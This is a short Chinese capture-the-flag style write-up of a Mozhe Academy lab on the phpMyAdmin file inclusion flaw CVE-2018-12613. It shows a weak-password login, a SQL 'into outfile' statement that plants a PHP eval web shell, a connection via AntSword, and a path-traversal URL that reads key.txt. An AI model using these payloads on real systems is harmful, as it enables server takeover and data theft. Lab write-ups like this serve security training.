墨者学院 phpMyAdmin后台文件包含分析溯源

fe3ab7e362b28511.png

打开题目

f1423ad1c6e2d004.png

 输了一下弱密码root,root,结果直接登陆进了数据库。

 百度了一下该漏洞为CVE-2018-12613 PhpMyadmin后台文件包含分析

进入之后界面如下

6a8b231dc63c68ec.png

点击SQL选项界面

输入语句

1
select '<?php @eval($_POST[cmd])?> 呜呜呜我太厉害了 ' into outfile '/var/www/html/1.php'

86ca6ebb2df4d311.png

点击右下角执行

出现界面

4d7080d33e44c41d.png

之后我们蚁剑连接

访问一下1.php(这个时候php代码已经执行啦,直接用蚁剑来连接:准备连接

15e0e32a4ca39c7c.png

然后我们到根目录去找到了key.txt

d1f227b115dd93ad.png

解决完成了

还有一种方法也很快利用文件包含目录穿透来解决的

c33d3d92e8e1cde2.png

1
http://124.70.71.251:46100/index.php?target=db_datadict.php?/../../../../../key.txt

5f73471da75b0f17.png

都可以找到漏洞执行代码。